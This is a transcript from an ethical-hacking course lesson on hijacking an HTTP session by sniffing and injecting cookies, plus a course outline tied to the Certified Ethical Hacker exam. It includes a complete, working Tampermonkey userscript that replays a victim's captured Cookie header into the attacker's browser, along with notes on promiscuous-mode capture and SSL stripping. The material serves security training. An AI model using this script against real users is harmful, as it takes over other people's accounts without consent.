Install Tampermonkey, and show how interception of a cookie from network traffic allows an HTTP session to be hijacked.
- [Instructor] In order to demonstrate how a session can be hijacked using cookies, I first have to install an extension called Tampermonkey into my Chrome browser, and install a cookie injection script. I'm at the Tampermonkey site, and I'll select the Stable version. Chrome will ask if I want to add the extension. I do. It downloads and automatically installs. Now I've got Tampermonkey installed. I need to install an injection script.

The userscripts site holds a number of scripts, and the Original Cookie Injector script, which is shown here, will do us just fine. I'll select and copy it with Control + C. I'll open the Tampermonkey icon on the top right, and select Add a new script. I'll paste the script onto the script page. There are a few missing semicolons. I'll just add them and clean up the syntax errors.

Okay, I'll now save the script, and we can see the Cookie injection script is active. Note that before I start the hijack, I need to set the virtual machine to allow promiscuous mode so that I can collect network traffic.
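The userscript below is an added example of what a cookie injector of the kind installed in the video does; it is not the Original Cookie Injector script and not the instructor's code. It assumes the attacker has already sniffed a victim's plaintext HTTP request (the promiscuous-mode capture mentioned above) and has the raw `Cookie:` request-header line to paste in. The Tampermonkey header directives (`@match`, `@grant none`) are real Tampermonkey syntax; the script name, the `SAMPLE_HEADER` value and the `PHPSESSID`/`security`/`prefs` cookie names are constructed for illustration.

```javascript
// ==UserScript==
// @name         Captured-cookie injector (hypothetical added example)
// @match        http://*/*
// @grant        none
// ==/UserScript==
//
// Takes the raw "Cookie:" header line lifted from a sniffed HTTP request
// (for example copied out of a Wireshark capture) and replays each cookie
// into the current document, so the browser presents the victim's session
// identifier on its next request to the same host.

// Parse a raw "Cookie:" request-header value into [{name, value}] pairs.
// Splits each pair only on the first '=' so base64 values that end in '='
// survive intact, skips empty segments (trailing ';'), and drops segments
// with no name, which a sniffed header should not contain but a hasty
// paste often does.
function parseCookieHeader(header) {
  const value = header.replace(/^\s*Cookie:\s*/i, '');
  const cookies = [];
  for (const part of value.split(';')) {
    const trimmed = part.trim();
    if (!trimmed) continue;                 // empty segment, e.g. "a=1;;b=2"
    const eq = trimmed.indexOf('=');
    if (eq <= 0) continue;                  // no name before '=': malformed, skip
    cookies.push({
      name: trimmed.slice(0, eq).trim(),
      value: trimmed.slice(eq + 1),
    });
  }
  return cookies;
}

// Write each captured cookie into a document-like object. In Tampermonkey
// `doc` is the page's `document`; in an offline test it is a stub with a
// `cookie` setter. path=/ makes the browser send the cookie for every URL
// on the host, matching how the victim's browser sent it. Returns the
// number of cookies written.
function injectCookies(header, doc) {
  const cookies = parseCookieHeader(header);
  for (const c of cookies) {
    doc.cookie = `${c.name}=${c.value}; path=/`;
  }
  return cookies.length;
}

// Constructed sample of a sniffed request header (not a real capture).
const SAMPLE_HEADER = 'Cookie: PHPSESSID=a1b2c3d4e5f6; security=low; prefs=YWJj=';

if (typeof document !== 'undefined') {
  // Running inside the browser under Tampermonkey: ask for the sniffed
  // header, inject it, and reload so the next request carries the cookies.
  const captured = window.prompt('Paste the captured Cookie: header');
  if (captured && injectCookies(captured, document) > 0) {
    window.location.reload();
  }
}
```

The injection only works because the cookie crossed the network in cleartext. A session cookie marked `Secure` on a site served over HTTPS never appears in such a capture, which is why the SSL-stripping step listed in this course's outline is the usual prerequisite for cookie hijacking against a modern site.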
This course teaches you what session hijacking is, and how black-hat hackers use it to attack an organization. Learn how TCP, web, and wireless protocols work and how hackers exploit them. Find out how to use built-in Windows and Linux tools, as well as specialized third-party solutions such as Zed Attack Proxy (ZAP) and Cain, to detect and shore up vulnerabilities. Author and cybersecurity expert Malcolm Shore also discusses remote hijacking, which allows hackers to take control of drones or even vehicles.
Note: This course maps to the Session Hijacking domain of the Certified Ethical Hacking exam. Review the exam objectives at the EC-Council's website.
- Hijacking a network session, such as a Telnet session
- Understand web sessions
- Intercepting sessions via man-in-the-middle or man-in-the-browser attacks
- Downgrading a session by stripping SSL
- Using ARP poisoning through Subterfuge
- Hijacking an HTTP session through cookies
- Using hijacking defense tools: Zed Attack Proxy and Cain
- Service hijacking (DNS and SSH)
- Hijacking in the physical world: cars and drones